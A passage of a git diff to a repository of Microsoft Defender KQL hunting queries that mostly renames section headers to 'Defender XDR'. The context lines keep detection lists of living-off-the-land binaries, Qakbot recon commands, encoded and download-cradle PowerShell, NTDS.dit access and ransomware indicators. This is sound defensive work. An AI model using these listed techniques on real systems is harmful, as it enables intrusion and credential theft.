@@ -14,7 +14,7 @@ An actor has gained access to your network and uses a rare lolbin to communicate #### References - https://lolbas-project.github.io/ -## Defender For Endpoint +## Defender XDR ``` let LOLBins = dynamic(["AppInstaller.exe", "Aspnet_Compiler.exe", "At.exe", "Atbroker.exe", "Bash.exe", "Bitsadmin.exe", "CertOC.exe", "CertReq.exe", "Certutil.exe", "Cmd.exe", "Cmdkey.exe", "cmdl32.exe", "Cmstp.exe", "ConfigSecurityPolicy.exe", "Conhost.exe", "Control.exe", "Csc.exe", "Cscript.exe", "CustomShellHost.exe", "DataSvcUtil.exe", "Desktopimgdownldr.exe", "DeviceCredentialDeployment.exe", "Dfsvc.exe", "Diantz.exe", "Diskshadow.exe", "Dnscmd.exe", "Esentutl.exe", "Eventvwr.exe", "Expand.exe", "Explorer.exe", "Extexport.exe", "Extrac32.exe", "Findstr.exe", "Finger.exe", "fltMC.exe", "Forfiles.exe", "Ftp.exe", "Gpscript.exe", "Hh.exe", "IMEWDBLD.exe", "Ie4uinit.exe", "Ieexec.exe", "Ilasm.exe", "Infdefaultinstall.exe", "Installutil.exe", "Jsc.exe", "Ldifde.exe", "Makecab.exe", "Mavinject.exe", "Msedge.exe", "Microsoft.Workflow.Compiler.exe", "Mmc.exe", "MpCmdRun.exe", "Msbuild.exe", "Msconfig.exe", "Msdt.exe", "Mshta.exe", "Msiexec.exe", "Netsh.exe", "Odbcconf.exe", "OfflineScannerShell.exe", "OneDriveStandaloneUpdater.exe", "Pcalua.exe", "Pcwrun.exe", "Pktmon.exe", "Pnputil.exe", "Presentationhost.exe", "Print.exe", "PrintBrm.exe", "Psr.exe", "Rasautou.exe", "rdrleakdiag.exe", "Reg.exe", "Regasm.exe", "Regedit.exe", "Regini.exe", "Register-cimprovider.exe", "Regsvcs.exe", "Regsvr32.exe", "Replace.exe", "Rpcping.exe", "Rundll32.exe", "Runexehelper.exe", "Runonce.exe", "Runscripthelper.exe", "Sc.exe", "Schtasks.exe", "Scriptrunner.exe", "Setres.exe", "SettingSyncHost.exe", "Stordiag.exe", "SyncAppvPublishingServer.exe", "Ttdinject.exe", "Tttracer.exe", "Unregmp2.exe", "vbc.exe", "Verclsid.exe", "Wab.exe", "winget.exe", "Wlrmdr.exe", "Wmic.exe", "WorkFolders.exe", "Wscript.exe", "Wsreset.exe", "wuauclt.exe", "Xwizard.exe", "fsutil.exe", "wt.exe", 
"GfxDownloadWrapper.exe", "Advpack.dll", "Desk.cpl", "Dfshim.dll", "Ieadvpack.dll", "Ieframe.dll", "Mshtml.dll", "Pcwutl.dll", "Setupapi.dll", "Shdocvw.dll", "Shell32.dll", "Syssetup.dll", "Url.dll", "Zipfldr.dll", "Comsvcs.dll", "AccCheckConsole.exe", "adplus.exe", "AgentExecutor.exe", "Appvlp.exe", "Bginfo.exe", "Cdb.exe", "coregen.exe", "Createdump.exe", "csi.exe", "DefaultPack.EXE", "Devinit.exe"]); // List all lolbins that have made remote connection to public IPs between the last 30 and 2 days. diff --git a/Defender For Endpoint/Living Off The Land/RMMConnection.md b/Defender For Endpoint/Living Off The Land/RMMConnection.md index 8583e5a..2259f4d 100644 --- a/Defender For Endpoint/Living Off The Land/RMMConnection.md +++ b/Defender For Endpoint/Living Off The Land/RMMConnection.md @@ -20,7 +20,7 @@ An actor uses RRM tools to gain remote access to your environment. - https://lolrmm.io/ - https://x.com/Antonlovesdnb/status/1840823846720385482 -## Defender For Endpoint +## Defender XDR ```KQL // First part based on tweet by: @Antonlovesdnb https://x.com/Antonlovesdnb/status/1840823846720385482 let LOLRMM = externaldata(Name:string,Category:string,Description:string,Author:string,Date:datetime,LastModified:datetime,Website:string,Filename:string,OriginalFileName:string,PEDescription:string,Product:string,Privileges:string,Free:string,Verification:string,SupportedOS:string,Capabilities:string, diff --git a/Defender For Endpoint/Living Off The Land/WMICRemoteCommand.md b/Defender For Endpoint/Living Off The Land/WMICRemoteCommand.md index 69506c3..cee9c93 100644 --- a/Defender For Endpoint/Living Off The Land/WMICRemoteCommand.md +++ b/Defender For Endpoint/Living Off The Land/WMICRemoteCommand.md 
@@ -20,7 +20,7 @@ An actor uses WMIC to remotely execute malicious commands. - https://web.archive.org/web/20230728141353/https://research.nccgroup.com/2021/01/12/abusing-cloud-services-to-fly-under-the-radar/ - https://learn.microsoft.com/en-us/windows/win32/wmisdk/wmic -## Defender For Endpoint +## Defender XDR ``` let IPRegex = '[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}'; DeviceProcessEvents diff --git a/Defender For Endpoint/LocalAccountCreated.md b/Defender For Endpoint/LocalAccountCreated.md index a9429aa..eff7402 100644 --- a/Defender For Endpoint/LocalAccountCreated.md +++ b/Defender For Endpoint/LocalAccountCreated.md @@ -18,7 +18,7 @@ An actor uses a local account to perform malicious activities. Those accounts ar - https://blog.carnal0wnage.com/2012/09/more-on-aptsim.html - https://www.mandiant.com/resources/blog/darkside-affiliate-supply-chain-software-compromise -## Defender For Endpoint +## Defender XDR ``` // Collect all Server IDs for filter let Servers = DeviceInfo diff --git a/Defender For Endpoint/LocalAdminAdditions.md b/Defender For Endpoint/LocalAdminAdditions.md index 21f5904..bb4ce15 100644 --- a/Defender For Endpoint/LocalAdminAdditions.md +++ b/Defender For Endpoint/LocalAdminAdditions.md @@ -17,7 +17,7 @@ Local Admin accounts have high priviliges on and can should be limited. #### References - https://learn.microsoft.com/en-us/windows/security/identity-protection/access-control/local-accounts#administrator -## Defender For Endpoint +## Defender XDR ```KQL DeviceEvents | where ActionType == "UserAccountAddedToLocalGroup" @@ -46,4 +46,4 @@ DeviceEvents | summarize LocalAdmins = make_set(AccountSid) by DeviceName | extend TotalLocalAdmins = array_length(LocalAdmins) | sort by TotalLocalAdmins -``` \ No newline at end of file +``` diff --git a/Defender For Endpoint/LocalAdminsWithTheMostDevicesAccessed.md b/Defender For Endpoint/LocalAdminsWithTheMostDevicesAccessed.md index bdeb720..073cd01 100644 
--- a/Defender For Endpoint/LocalAdminsWithTheMostDevicesAccessed.md +++ b/Defender For Endpoint/LocalAdminsWithTheMostDevicesAccessed.md @@ -1,6 +1,6 @@ # Hunt for Local Admins with the most RemoteInteractive logins ---- -### Defender For Endpoint +### Defender XDR ``` DeviceLogonEvents diff --git a/Defender For Endpoint/LocalFirewallAdditions.md b/Defender For Endpoint/LocalFirewallAdditions.md index 775fa9f..b297f8e 100644 --- a/Defender For Endpoint/LocalFirewallAdditions.md +++ b/Defender For Endpoint/LocalFirewallAdditions.md @@ -1,6 +1,6 @@ # Hunt for Local Firewall Additions ---- -### Defender For Endpoint +### Defender XDR ``` DeviceProcessEvents diff --git a/Defender For Endpoint/LocalFirewallDeletions.md b/Defender For Endpoint/LocalFirewallDeletions.md index 8e6049b..ba05471 100644 --- a/Defender For Endpoint/LocalFirewallDeletions.md +++ b/Defender For Endpoint/LocalFirewallDeletions.md @@ -1,6 +1,6 @@ # Hunt for Local Firewall Deletions ---- -### Defender For Endpoint +### Defender XDR ``` DeviceProcessEvents diff --git a/Defender For Endpoint/LocalGroupCreation.md b/Defender For Endpoint/LocalGroupCreation.md index cb9207f..c12a37c 100644 --- a/Defender For Endpoint/LocalGroupCreation.md +++ b/Defender For Endpoint/LocalGroupCreation.md @@ -11,7 +11,7 @@ Local groups can be created in order to evade AD Group requirements and control #### References - https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.localaccounts/get-localgroup?view=powershell-5.1 -## Defender For Endpoint +## Defender XDR ```KQL let AllDomainControllers = DeviceNetworkEvents @@ -54,4 +54,4 @@ DeviceEvents | project DeviceId, OSPlatform, DeviceType) on DeviceId | project TimeGenerated, DeviceId, DeviceName, GroupName, GroupDomainName, GroupSid, OSPlatform, DeviceType, ReportId -``` \ No newline at end of file +``` diff --git a/Defender For Endpoint/LocalGroupDiscovery.md b/Defender For Endpoint/LocalGroupDiscovery.md index f75c6c3..16daa57 100644 
--- a/Defender For Endpoint/LocalGroupDiscovery.md +++ b/Defender For Endpoint/LocalGroupDiscovery.md @@ -18,7 +18,7 @@ A compromised account performs discovery activities in your environment. - https://thedfirreport.com/2021/11/29/continuing-the-bazar-ransomware-story/ - https://media.defense.gov/2023/May/24/2003229517/-1/-1/0/CSA_Living_off_the_Land.PDF -## Defender For Endpoint +## Defender XDR ```KQL let WhitelistedDepartments = dynamic(["Service Desk", "It Admins"]); let StartTime = 30d; @@ -53,4 +53,4 @@ DeviceProcessEvents // Filter whitelisted departments | where not(Department in (WhitelistedDepartments)) | project-reorder TimeGenerated, Department, ProcessCommandLine, GroupName -``` \ No newline at end of file +``` diff --git a/Defender For Endpoint/MultipleSentitiveGroupAdditions.md b/Defender For Endpoint/MultipleSentitiveGroupAdditions.md index 3ac6a71..c925043 100644 --- a/Defender For Endpoint/MultipleSentitiveGroupAdditions.md +++ b/Defender For Endpoint/MultipleSentitiveGroupAdditions.md @@ -17,7 +17,7 @@ An adversary got access to an account and tries to elevate permissions by adding #### References - https://www.huntress.com/blog/slashandgrab-screen-connect-post-exploitation-in-the-wild-cve-2024-1709-cve-2024-1708 -## Defender For Endpoint +## Defender XDR ```KQL let BinTimeFrame = 1h; let AlertThreshold = 3; @@ -76,4 +76,4 @@ DeviceProcessEvents | extend GroupIsSentitive = iff(ProcessCommandLine has_any (SensitiveGroupName), 1, 0) | summarize TotalCommands = dcount(ProcessCommandLine), ExecutedCommands = make_set(ProcessCommandLine), arg_max(TimeGenerated, *) by DeviceName, bin(TimeGenerated, BinTimeFrame) | where TotalCommands >= AlertThreshold -``` \ No newline at end of file +``` diff --git a/Defender For Endpoint/NTDSDitFileModifications.md b/Defender For Endpoint/NTDSDitFileModifications.md index d5ec353..e7de8bb 100644 --- a/Defender For Endpoint/NTDSDitFileModifications.md +++ b/Defender For Endpoint/NTDSDitFileModifications.md 
@@ -28,7 +28,7 @@ To get all devices or all files, instead of adding those fields to the group by - [Introducing ntdissector, a swiss army knife for your NTDS.dit files](https://www.synacktiv.com/publications/introducing-ntdissector-a-swiss-army-knife-for-your-ntdsdit-files.html) -## Defender For Endpoint +## Defender XDR ```KQL // Author: Alex Teixeira (alex@opstune.com) search in(DeviceFileEvents) "ntds" and "dit" and ActionType:"FileModified" diff --git a/Defender For Endpoint/NetDiscoveryActivities.md b/Defender For Endpoint/NetDiscoveryActivities.md index 15e9e55..d259dbe 100644 --- a/Defender For Endpoint/NetDiscoveryActivities.md +++ b/Defender For Endpoint/NetDiscoveryActivities.md @@ -25,7 +25,7 @@ The query calculates the amount of executions for each parameter together with t - https://www.trendmicro.com/en_us/research/19/f/shifting-tactics-breaking-down-ta505-groups-use-of-html-rats-and-other-techniques-in-latest-campaigns.html - https://www.cybereason.com/blog/operation-cuckoobees-deep-dive-into-stealthy-winnti-techniques -## Defender For Endpoint +## Defender XDR ```KQL let StartTime = 30d; DeviceProcessEvents @@ -54,4 +54,4 @@ DeviceProcessEvents | where NetActionType != "Other" | where isnotempty(AccountUpn) | summarize TotalEvents = count(), TotalAccountsEvents = countif(NetActionType == "ACCOUNTS"), TotalGroupEvents = countif(NetActionType == "GROUP"), TotalUserEvents = countif(NetActionType == "USER"), TotalLocalGroupEvents = countif(NetActionType == "LOCALGROUP"), ExecutedCommands = make_set(ProcessCommandLine) by AccountUpn -``` \ No newline at end of file +``` diff --git a/Defender For Endpoint/NetDiscoveryActivitiesDetected.md b/Defender For Endpoint/NetDiscoveryActivitiesDetected.md index cc35726..51df89d 100644 --- a/Defender For Endpoint/NetDiscoveryActivitiesDetected.md +++ b/Defender For Endpoint/NetDiscoveryActivitiesDetected.md 
@@ -33,7 +33,7 @@ An adversary has gained access to an account and tries to disover the network to - https://www.trendmicro.com/en_us/research/19/f/shifting-tactics-breaking-down-ta505-groups-use-of-html-rats-and-other-techniques-in-latest-campaigns.html - https://www.cybereason.com/blog/operation-cuckoobees-deep-dive-into-stealthy-winnti-techniques -## Defender For Endpoint +## Defender XDR ```KQL let StartTime = 2d; let BinFormat = 1d; @@ -70,4 +70,4 @@ DeviceProcessEvents | summarize TotalEvents = count(), TotalAccountsEvents = countif(NetActionType == "ACCOUNTS"), TotalGroupEvents = countif(NetActionType == "GROUP"), TotalUserEvents = countif(NetActionType == "USER"), TotalLocalGroupEvents = countif(NetActionType == "LOCALGROUP"), ExecutedCommands = make_set(ProcessCommandLine), LastEvent = arg_max(TimeGenerated, *), FirstEvent = arg_min(TimeGenerated, *) by AccountUpn, bin(TimeGenerated, BinFormat) | where TotalEvents >= Threshold | project-reorder FirstEvent, LastEvent, TotalEvents, TotalAccountsEvents, TotalGroupEvents, TotalLocalGroupEvents, TotalUserEvents, ExecutedCommands -``` \ No newline at end of file +``` diff --git a/Defender For Endpoint/NetQueryStatistics.md b/Defender For Endpoint/NetQueryStatistics.md index 4f763a7..ad32932 100644 --- a/Defender For Endpoint/NetQueryStatistics.md +++ b/Defender For Endpoint/NetQueryStatistics.md @@ -10,7 +10,7 @@ This query can be used to list the statistics of the entities that have been que - https://www.trendmicro.com/en_us/research/19/f/shifting-tactics-breaking-down-ta505-groups-use-of-html-rats-and-other-techniques-in-latest-campaigns.html - https://www.cybereason.com/blog/operation-cuckoobees-deep-dive-into-stealthy-winnti-techniques -## Defender For Endpoint +## Defender XDR ```KQL let StartTime = 30d; DeviceProcessEvents 
@@ -57,4 +57,4 @@ DeviceProcessEvents | summarize arg_max(TimeGenerated, *) by ReportId | summarize TotalQueries = count() by QueriedEntity, NetActionType | sort by TotalQueries -``` \ No newline at end of file +``` diff --git a/Defender For Endpoint/Network - AnyDeskConnectionToPublicIP.md b/Defender For Endpoint/Network - AnyDeskConnectionToPublicIP.md index 544a120..1bb6fd3 100644 --- a/Defender For Endpoint/Network - AnyDeskConnectionToPublicIP.md +++ b/Defender For Endpoint/Network - AnyDeskConnectionToPublicIP.md @@ -8,7 +8,7 @@ | --- | --- | --- | | T1219 | Remote Access Software | https://attack.mitre.org/techniques/T1219/ | -### Defender For Endpoint +### Defender XDR ``` DeviceNetworkEvents diff --git a/Defender For Endpoint/Network - DevicesWithMostOpenPorts.md b/Defender For Endpoint/Network - DevicesWithMostOpenPorts.md index 9aec998..f168bfd 100644 --- a/Defender For Endpoint/Network - DevicesWithMostOpenPorts.md +++ b/Defender For Endpoint/Network - DevicesWithMostOpenPorts.md @@ -1,6 +1,6 @@ # List the devices with the most open ports ---- -### Defender For Endpoint +### Defender XDR ``` DeviceNetworkEvents diff --git a/Defender For Endpoint/Network - InterestingOpenPorts.md b/Defender For Endpoint/Network - InterestingOpenPorts.md index 16e3a31..8695caf 100644 --- a/Defender For Endpoint/Network - InterestingOpenPorts.md +++ b/Defender For Endpoint/Network - InterestingOpenPorts.md @@ -13,7 +13,7 @@ The interesting ports defined in the query: - 3306: MySQL - 8080: Alternative HTTP -## Defender For Endpoint +## Defender XDR ``` let portlist = dynamic([21, 22, 25, 53, 80, 110, 443, 1433, 1434, 3306, 8080]); //Add relevant ports in the list if needed diff --git a/Defender For Endpoint/Network - OpenDatabasePorts.md b/Defender For Endpoint/Network - OpenDatabasePorts.md index 0fa44c4..265f46e 100644 --- a/Defender For Endpoint/Network - OpenDatabasePorts.md +++ b/Defender For Endpoint/Network - OpenDatabasePorts.md 
@@ -10,7 +10,7 @@ The database ports defined in the query: - 5432: PostgreSQL -### Defender For Endpoint +### Defender XDR ``` let databaseports = dynamic([1433, 1434, 1583, 3050, 3306, 3351, 5432]); diff --git a/Defender For Endpoint/Network - OpenRemoteServicePorts.md b/Defender For Endpoint/Network - OpenRemoteServicePorts.md index 4a8780b..379948c 100644 --- a/Defender For Endpoint/Network - OpenRemoteServicePorts.md +++ b/Defender For Endpoint/Network - OpenRemoteServicePorts.md @@ -9,7 +9,7 @@ The database ports defined in the query: - 5985: WinRM v2 - 5986: WinRM -### Defender For Endpoint +### Defender XDR ``` let RemoteServices = dynamic([22, 139, 445, 3389, 5900, 5985, 5986]); diff --git a/Defender For Endpoint/NewRDPConnections.md b/Defender For Endpoint/NewRDPConnections.md index ff319ed..8d29106 100644 --- a/Defender For Endpoint/NewRDPConnections.md +++ b/Defender For Endpoint/NewRDPConnections.md @@ -1,6 +1,6 @@ # Detect new RDP connections to devices that have not been established in the past 20 days ---- -### Defender For Endpoint +### Defender XDR ```KQL let PreviousRDPConnections = materialize ( diff --git a/Defender For Endpoint/NewSysinternalToolDetected.md b/Defender For Endpoint/NewSysinternalToolDetected.md index fceed8b..4c980c1 100644 --- a/Defender For Endpoint/NewSysinternalToolDetected.md +++ b/Defender For Endpoint/NewSysinternalToolDetected.md 
@@ -1,6 +1,6 @@ # Detect the use of a new Sysinternal tool that has not been used in the last 90 days ---- -### Defender For Endpoint +### Defender XDR ``` let SysInternalSuite = dynamic(["accesschk.exe","accesschk64.exe","AccessEnum.exe", "AdExplorer.exe","ADExplorer.exe","ADExplorer64.exe","ADInsight.chm","ADInsight.exe","ADInsight64.exe","adrestore.exe","adrestore64.exe","Autologon.exe","Autologon64.exe","autoruns.chm","Autoruns.exe","Autoruns64.exe","autorunsc.exe","autorunsc64.exe","Bginfo.exe","Bginfo64.exe","Cacheset.exe","Cacheset64.exe","Clockres.exe","Clockres64.exe","Contig.exe","Contig64.exe","Coreinfo.exe","Coreinfo64.exe","CPUSTRES.exe","CPUSTRES64.exe","ctrl2cap.amd.sys","ctrl2cap.exe","Dbgview.chm","Dbgview.exe","dbgview64.exe","Desktops.exe","Desktops64.exe","Disk2vhd.chm","disk2vhd.exe","disk2vhd64.exe","diskext.exe","diskext64.exe","Diskmon.exe","Diskmon64.exe","DiskView.exe","DiskView64.exe","du.exe","du64.exe","efsdump.exe","Eula.txt","FindLinks.exe","FindLinks64.exe","handle.exe","handle64.exe","hex2dec.exe","hex2dec64.exe","junction.exe","junction64.exe","ldmdump.exe","Listdlls.exe","Listdlls64.exe","livekd.exe","livekd64.exe","LoadOrd.exe","LoadOrd64.exe","LoadOrdC.exe","LoadOrdC64.exe","logonsessions.exe","logonsessions64.exe","movefile.exe","movefile64.exe","notmyfault.exe","notmyfault64.exe","notmyfaultc.exe","notmyfaultc64.exe","ntfsinfo.exe","ntfsinfo64.exe","pendmoves.exe","pendmoves64.exe","pipelist.exe","pipelist64.exe","portmon.exe","procdump.exe","procdump64.exe","procexp.chm","procexp.exe","procexp64.exe","procmon.chm","Procmon.exe","Procmon64.exe","PsExec.exe","PsExec64.exe","psfile.exe","psfile64.exe","PsGetsid.exe","PsGetsid64.exe","PsInfo.exe","PsInfo64.exe","pskill.exe","pskill64.exe","pslist.exe","pslist64.exe","PsLoggedon.exe","PsLoggedon64.exe","psloglist.exe","psloglist64.exe","pspasswd.exe","pspasswd64.exe","psping.exe","psping64.exe","PsService.exe","PsService64.exe","psshutdown.exe","psshutdown64.exe","pssuspend.exe","p
ssuspend64.exe","Pstools.chm","psversion.txt","RAMMap.exe","RAMMap64.exe","RDCMan.exe","readme.txt","RegDelNull.exe","RegDelNull64.exe","regjump.exe","ru.exe","ru64.exe","sdelete.exe","sdelete64.exe","ShareEnum.exe","ShareEnum64.exe","ShellRunas.exe","sigcheck.exe","sigcheck64.exe","streams.exe","streams64.exe","strings.exe","strings64.exe","sync.exe","sync64.exe","Sysmon.exe","Sysmon64.exe","tcpvcon.exe","tcpvcon64.exe","tcpview.chm","tcpview.exe","tcpview64.exe","Testlimit.exe","Testlimit64.exe","Vmmap.chm","vmmap.exe","vmmap64.exe","Volumeid.exe","Volumeid64.exe","whois.exe","whois64.exe","Winobj.exe","Winobj64.exe","ZoomIt.exe","ZoomIt64.exe"]); diff --git a/Defender For Endpoint/NltestDiscovery.md b/Defender For Endpoint/NltestDiscovery.md index f88a249..5862fd8 100644 --- a/Defender For Endpoint/NltestDiscovery.md +++ b/Defender For Endpoint/NltestDiscovery.md @@ -44,4 +44,4 @@ DeviceProcessEvents | where ParsedCommandLine has_any (NLTestParameters) | summarize TotalQueries = count(), TotalUniqueQueries = dcount(ProcessCommandLine), Commands = make_set(ProcessCommandLine, 100), arg_max(TimeGenerated, *) by DeviceName, AccountUpn, bin(TimeGenerated, BinSize) | where TotalQueries >= Threshold -``` \ No newline at end of file +``` diff --git a/Defender For Endpoint/OutboundConhostConnection.md b/Defender For Endpoint/OutboundConhostConnection.md index f5eab01..9a13463 100644 --- a/Defender For Endpoint/OutboundConhostConnection.md +++ b/Defender For Endpoint/OutboundConhostConnection.md @@ -13,7 +13,7 @@ It is unexpected that conhost makes connections to external domains. - https://github.com/Bert-JanP/Hunting-Queries-Detection-Rules - example link 3 -## Defender For Endpoint +## Defender XDR ```KQL let ValidDomains = dynamic(['.microsoft.com', '.digicert.com']); DeviceNetworkEvents 
@@ -28,4 +28,4 @@ DeviceNetworkEvents | where InitiatingProcessFileName =~ "conhost.exe" | where not(ipv4_is_private(RemoteIP) or RemoteIP == "127.0.0.1") | where not(RemoteUrl has_any (ValidDomains)) -``` \ No newline at end of file +``` diff --git a/Defender For Endpoint/PSExecExecutions.md b/Defender For Endpoint/PSExecExecutions.md index 20cf1af..4749fe4 100644 --- a/Defender For Endpoint/PSExecExecutions.md +++ b/Defender For Endpoint/PSExecExecutions.md @@ -15,7 +15,7 @@ A actor uses PsExec to remotely run commands. - https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.core/enable-psremoting?view=powershell-7.3 - https://www.cybereason.com/blog/research/operation-soft-cell-a-worldwide-campaign-against-telecommunications-providers -## Defender For Endpoint +## Defender XDR ``` DeviceProcessEvents // Collect all executed psexec commands @@ -41,4 +41,4 @@ DeviceProcessEvents // Collect stats and lists with remote devices and executed commands | summarize TotalRemoteDevices = dcount(RemoteDevice), RemoteDeviceList = make_set(RemoteDevice), ExecutedCommands = make_set(ProcessCommandLine) by DeviceName | sort by TotalRemoteDevices -``` \ No newline at end of file +``` diff --git a/Defender For Endpoint/PowerShellEncodedCommandsByDevice.md b/Defender For Endpoint/PowerShellEncodedCommandsByDevice.md index 620a93c..095f9e6 100644 --- a/Defender For Endpoint/PowerShellEncodedCommandsByDevice.md +++ b/Defender For Endpoint/PowerShellEncodedCommandsByDevice.md @@ -8,7 +8,7 @@ | --- | --- | --- | | T1027 | Obfuscated Files or Information |https://attack.mitre.org/techniques/T1027/ | -## Defender For Endpoint +## Defender XDR ``` let EncodedList = dynamic(['-encodedcommand', '-enc']); // For more results use line below en filter one above. This will also return more FPs. diff --git a/Defender For Endpoint/PowerShellEncodedCommandsExecuted.md b/Defender For Endpoint/PowerShellEncodedCommandsExecuted.md index 11582f9..938c777 100644 
--- a/Defender For Endpoint/PowerShellEncodedCommandsExecuted.md +++ b/Defender For Endpoint/PowerShellEncodedCommandsExecuted.md @@ -8,7 +8,7 @@ | --- | --- | --- | | T1027 | Obfuscated Files or Information |https://attack.mitre.org/techniques/T1027/ | -### Defender For Endpoint +### Defender XDR ``` let EncodedList = dynamic(['-encodedcommand', '-enc']); diff --git a/Defender For Endpoint/PowerShellEncodedReconActivities.md b/Defender For Endpoint/PowerShellEncodedReconActivities.md index 56d5726..292cf35 100644 --- a/Defender For Endpoint/PowerShellEncodedReconActivities.md +++ b/Defender For Endpoint/PowerShellEncodedReconActivities.md @@ -20,7 +20,7 @@ An advasary uses an encoded PowerShell command to collect information on of othe - https://community.sophos.com/sophos-labs/b/blog/posts/decoding-malicious-powershell - https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/tracking-detecting-and-thwarting-powershell-based-malware-and-attacks -## Defender For Endpoint +## Defender XDR ``` let EncodedList = dynamic(['-encodedcommand', '-enc']); diff --git a/Defender For Endpoint/PowerShellEncodedWebRequests.md b/Defender For Endpoint/PowerShellEncodedWebRequests.md index 0dde8db..1c4bcbf 100644 --- a/Defender For Endpoint/PowerShellEncodedWebRequests.md +++ b/Defender For Endpoint/PowerShellEncodedWebRequests.md @@ -19,7 +19,7 @@ An advasary uses an encoded PowerShell command to collect a payload. - https://community.sophos.com/sophos-labs/b/blog/posts/decoding-malicious-powershell - https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/tracking-detecting-and-thwarting-powershell-based-malware-and-attacks -## Defender For Endpoint +## Defender XDR ``` let EncodedList = dynamic(['-encodedcommand', '-enc']); // For more results use line below en filter one above. This will also return more FPs. 
diff --git a/Defender For Endpoint/PowerShellInvokeWebrequest.md b/Defender For Endpoint/PowerShellInvokeWebrequest.md index 23810d5..38ca0d8 100644 --- a/Defender For Endpoint/PowerShellInvokeWebrequest.md +++ b/Defender For Endpoint/PowerShellInvokeWebrequest.md @@ -20,7 +20,7 @@ A malicious script is remotely downloaded and executed. - https://www.microsoft.com/en-us/security/blog/2022/06/02/exposing-polonium-activity-and-infrastructure-targeting-israeli-organizations/ - https://www.huntress.com/blog/slashandgrab-screen-connect-post-exploitation-in-the-wild-cve-2024-1709-cve-2024-1708 -## Defender For Endpoint +## Defender XDR ```KQL let IPRegex = '[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}'; let AllowedDomains = dynamic(['google.com']); @@ -63,4 +63,4 @@ DeviceNetworkEvents // If you only want to include servers in this detection use line below //| where DeviceId in (Servers) | project-reorder TimeGenerated, InitiatingProcessCommandLine, RemoteUrl, ActionType, CommandLineIpv4 -``` \ No newline at end of file +``` diff --git a/Defender For Endpoint/PowerShellNoProfile.md b/Defender For Endpoint/PowerShellNoProfile.md index 41277c0..9dbc8a8 100644 --- a/Defender For Endpoint/PowerShellNoProfile.md +++ b/Defender For Endpoint/PowerShellNoProfile.md @@ -29,7 +29,7 @@ APT28 has access to your environment and executes malicious commands. - https://attack.mitre.org/groups/G0007/ - https://medium.com/cyberscribers-exploring-cybersecurity/apt28-from-initial-damage-to-domain-controller-threats-in-an-hour-cert-ua-8399-1944dd6edcdf -## Defender For Endpoint +## Defender XDR ```KQL DeviceProcessEvents | where ProcessCommandLine has_all ("-nop", "powershell.exe") @@ -40,4 +40,4 @@ DeviceProcessEvents DeviceProcessEvents | where ProcessCommandLine has_all ("-nop", "powershell.exe") | summarize TotalCommands = dcount(ProcessCommandLine), ExecutedCommands = make_set(ProcessCommandLine) by DeviceName -``` \ No newline at end of file +``` 
diff --git a/Defender For Endpoint/PublicFacingDeviceScanned.md b/Defender For Endpoint/PublicFacingDeviceScanned.md index 6f8a352..895ce06 100644 --- a/Defender For Endpoint/PublicFacingDeviceScanned.md +++ b/Defender For Endpoint/PublicFacingDeviceScanned.md @@ -15,7 +15,7 @@ Adversaries can get access trough open (vulnerable) services. #### References - https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/internet-facing-devices?view=o365-worldwide -## Defender For Endpoint +## Defender XDR ``` DeviceNetworkEvents diff --git a/Defender For Endpoint/QakbotPostCompromiseCommandsExecuted.md b/Defender For Endpoint/QakbotPostCompromiseCommandsExecuted.md index 70ae3c8..de91abd 100644 --- a/Defender For Endpoint/QakbotPostCompromiseCommandsExecuted.md +++ b/Defender For Endpoint/QakbotPostCompromiseCommandsExecuted.md @@ -1,6 +1,6 @@ # Detect when multiple Qakbot post compromise commands have been executed -### Defender For Endpoint +### Defender XDR ``` let QakBotCommands = dynamic(['net view', 'cmd /c set', 'arp -a', 'ipconfig /all', 'nslookup-querytype=ALL -timeout=12', '_ldap._tcp.dc._msdcs.WORKGROUP', 'net share', 'net1 share', 'route print', 'net localgroup', 'whoami /all']); // source: https://twitter.com/1ZRR4H/status/1568395544359309312 diff --git a/Defender For Endpoint/Ransomware/KillNetRansomwareDetection.md b/Defender For Endpoint/Ransomware/KillNetRansomwareDetection.md index 0bac4dc..28fe483 100644 --- a/Defender For Endpoint/Ransomware/KillNetRansomwareDetection.md +++ b/Defender For Endpoint/Ransomware/KillNetRansomwareDetection.md @@ -2,7 +2,7 @@ Source: https://www.virustotal.com/gui/file/db1c8ddcdfea93031a565001366ffa9fdb41a689bddab46aec7611a46bb4dc50/detection -### Defender For Endpoint +### Defender XDR ``` let killnetRansomNote = "ru.txt"; diff --git a/Defender For Endpoint/Ransomware/RansomwareDoubleExtention.md b/Defender For Endpoint/Ransomware/RansomwareDoubleExtention.md index 83ff3c2..9010654 100644 
--- a/Defender For Endpoint/Ransomware/RansomwareDoubleExtention.md +++ b/Defender For Endpoint/Ransomware/RansomwareDoubleExtention.md @@ -22,7 +22,7 @@ Ransomware is being deployed in your environment. - https://app.any.run/tasks/d66ead5a-faf4-4437-93aa-65785afaf9e5/ -## Defender For Endpoint +## Defender XDR ``` // Based on https://github.com/SigmaHQ/sigma/blob/master/rules/windows/file/file_rename/file_rename_win_ransomware.yml // Add your most common file extentions in this list diff --git a/Defender For Endpoint/Ransomware/RansomwareExtensionFound.md b/Defender For Endpoint/Ransomware/RansomwareExtensionFound.md index 0d812e2..f9f2c58 100644 --- a/Defender For Endpoint/Ransomware/RansomwareExtensionFound.md +++ b/Defender For Endpoint/Ransomware/RansomwareExtensionFound.md @@ -1,6 +1,6 @@ # Triggers when a known ransomware extension has been found ---- -### Defender For Endpoint +### Defender XDR ``` let RansomwareExtensionsInput = externaldata(Extension: string)[@"https://raw.githubusercontent.com/eshlomo1/Ransomware-NOTE/main/ransomware-extension-list.txt"] with (format="txt", ignoreFirstRecord=True); diff --git a/Defender For Endpoint/Ransomware/RansomwareNoteFound.md b/Defender For Endpoint/Ransomware/RansomwareNoteFound.md index d646d89..5b102d7 100644 --- a/Defender For Endpoint/Ransomware/RansomwareNoteFound.md +++ b/Defender For Endpoint/Ransomware/RansomwareNoteFound.md @@ -1,6 +1,6 @@ # Triggers when a know ransomware note is found ---- -### Defender For Endpoint +### Defender XDR ``` let RansomwareNotes = externaldata(RansomwareNote: string)[@"https://raw.githubusercontent.com/eshlomo1/Ransomware-NOTE/main/ransomware-notes.txt"] with (format="txt", ignoreFirstRecord=True); diff --git 